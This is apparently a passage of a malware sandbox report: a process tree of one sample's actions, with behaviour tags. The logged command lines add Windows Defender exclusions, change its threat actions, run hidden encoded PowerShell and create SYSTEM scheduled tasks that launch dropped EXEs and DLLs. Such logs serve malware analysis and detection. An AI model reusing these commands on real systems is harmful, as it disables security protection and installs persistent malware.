                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:436
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2408
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1544
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:2412
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:680
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:2060
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:1704
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1312
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1648
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:2304
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:564
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:2952
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:3060
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:2068
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:2008
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:1580
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2792
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2544
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2564
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:2848
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2636
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "gvGVRoOoJ" /SC once /ST 00:58:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2692
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "gvGVRoOoJ"
                                                                                                                                            3⤵
                                                                                                                                              PID:3004
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "gvGVRoOoJ"
                                                                                                                                              3⤵
                                                                                                                                                PID:1564
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2460
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2492
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2444
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1296
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:36:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\tvvxXtH.exe\" 0c /lrCZdidsz 385128 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2252
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2244
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 240
                                                                                                                                                          3⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:2076
                                                                                                                                                      • C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\tvvxXtH.exe
                                                                                                                                                        C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\tvvxXtH.exe 0c /lrCZdidsz 385128 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:2420
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2812
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1404
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:1480
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1684
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1496
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:1516
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:756
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1232
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1476
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3000
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:644
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1652
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1472
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1752
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1332
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:2388
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1132
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:984
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2516
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1336
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:536
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:680
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:1988
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2072
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:908
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\KZZSjE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:2300
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\jWuXmiN.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1516
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1104
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1652
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\IMoIeeT.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:3036
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\Ubnvhwp.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2148
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\ipqjErW.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2116
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\leQIPIW.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1360
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:10:26 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\xZNLbCcL\poNlnXz.dll\",#1 /sOZdidrey 385128" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1304
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:920
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2784
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1532
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:2544
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\xZNLbCcL\poNlnXz.dll",#1 /sOZdidrey 385128
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2820
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\xZNLbCcL\poNlnXz.dll",#1 /sOZdidrey 385128
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:1500
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2480
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {F5A532B5-106C-48A2-B203-6E74EC0B00C2} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:348
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:2032
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2132
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:896
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1720
